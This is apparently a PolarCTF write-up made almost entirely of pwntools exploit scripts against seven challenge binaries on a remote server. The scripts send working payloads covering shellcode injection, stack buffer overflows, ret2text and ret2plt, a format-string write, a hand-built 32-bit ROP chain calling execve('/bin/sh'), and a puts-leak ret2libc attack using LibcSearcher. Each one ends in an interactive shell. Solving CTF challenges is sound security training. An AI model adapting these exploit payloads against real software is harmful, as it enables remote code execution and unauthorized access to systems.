polarCTF的WP

play

from pwn import *
p = remote("123.60.135.228", 2102)

elf = ELF("play")
context(log_level = "debug",arch = "amd64",os = "linux")

buf=0x00000000006010A0
shellcode = asm(shellcraft.sh())
p.sendlineafter('I think you must enjoy playing.',shellcode)

payload=(0x30+8)*b'a'+p64(buf)

p.sendlineafter("Name your favorite game?",payload)

p.interactive()

name4

from pwn import *
p = remote("123.60.135.228",2082)
#p=process('name4')

context(log_level = "debug",arch = "i386",os = "linux")
start=0x0804869E
read=0x08048410
buf=0xff8f8000
shellcode =asm(shellcraft.sh())
payload1=p32(0)
p.sendlineafter('Enter your name:',payload1)
p.sendlineafter('Enter your best friend name:',b'1')

payload2=(0x20+4)*b'a'+p32(read)+p32(buf)+p32(0)+p32(buf)+p32(100)
#attach(p)
p.sendlineafter("give you stack overflow:",payload2)
#attach(p)
p.sendlineafter("byebye",shellcode)


p.interactive()

dog

from pwn import *
p = remote("123.60.135.228",2084)
#p=process('name4')
context(log_level = "debug",arch = "i386",os = "linux")

payload=b'a'*(9+4)+p32(0x0804859B)
p.sendlineafter("This puppy needs to eat a few bones?",payload)

p.interactive()

fish

from pwn import *
p = remote("123.60.135.228",2149)
#p=process('fish')
context(log_level = "debug",arch = "i386",os = "linux")
payload=(0x6C+4)*b'a'+p32(0x08048450)+p32(0x08048480)+p32(0x0804A080)+p32(0x0804A080)
#                             gets           sys          buf              buf
p.sendline(payload)
p.sendline(b'/bin/sh')
p.interactive()

fmt

from pwn import *
p = remote("123.60.135.228",2076)
#p=process('fish')
n=0x0804A030
payload = fmtstr_payload(6, {n : 4})
p.sendlineafter("What's your name?",payload)
p.interactive()

03ret2syscall_32

from pwn import *
a = remote("123.60.135.228",2136)
#a=process('03ret2syscall_32')
p = (0x208+4)*b'a'
# ROP chain for 32-bit
# pop edx ; ret
p = (0x208+4)*b'a'

p += p32(0x0806f22a) # pop edx ; ret
p += p32(0x080ea060) # @ .data
p += p32(0x080b8576) # pop eax ; ret
p += b'/bin'
p += p32(0x08054b8b) # mov dword ptr [edx], eax ; ret
p += p32(0x0806f22a) # pop edx ; ret
p += p32(0x080ea064) # @ .data + 4
p += p32(0x080b8576) # pop eax ; ret
p += b'//sh'
p += p32(0x08054b8b) # mov dword ptr [edx], eax ; ret
p += p32(0x0806f22a) # pop edx ; ret
p += p32(0x080ea068) # @ .data + 8
p += p32(0x080494b3) # xor eax, eax ; ret
p += p32(0x08054b8b) # mov dword ptr [edx], eax ; ret
p += p32(0x080481c9) # pop ebx ; ret
p += p32(0x080ea060) # @ .data
p += p32(0x080ded85) # pop ecx ; ret
p += p32(0x080ea068) # @ .data + 8
p += p32(0x0806f22a) # pop edx ; ret
p += p32(0x080ea068) # @ .data + 8
p += p32(0x080494b3) # xor eax, eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0806cea3) # int 0x80


a.sendlineafter("Good Luck.",p)
a.interactive()

sleep

from pwn import *
from LibcSearcher import *
p = remote("123.60.135.228",2082)
#p= process('./sleep')
context.log_level="debug"
elf=ELF("sleep")
main_addr = 0x0000000004006BD
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
gets_plt = 0x000000000400550
pop_rdi_ret=0x0000000000400783

payload =b'a' * (0x70+8) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt)+p64(main_addr)
#attach(p)
p.sendlineafter("Please cherish every second of sleeping time !!!",payload)
#p.interactive()
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = 0x0000000000601040
ret_addr = 0x0000000000400501
#attach(p)
payload2 = b'a' * (0x70+8) +p64(ret_addr)+p64(pop_rdi_ret) + p64(0x000000000601040)+p64(gets_plt)+p64(ret_addr)+p64(main_addr)

p.sendlineafter("Please cherish every second of sleeping time !!!",payload2)
sleep(2)
p.sendline(b'/bin/sh\0')



payload2 = b'a' * (0x70+8) +p64(ret_addr)+p64(pop_rdi_ret) + p64(binsh_addr)+p64(system_addr)
p.sendlineafter("Please cherish every second of sleeping time !!!",payload2)
p.interactive()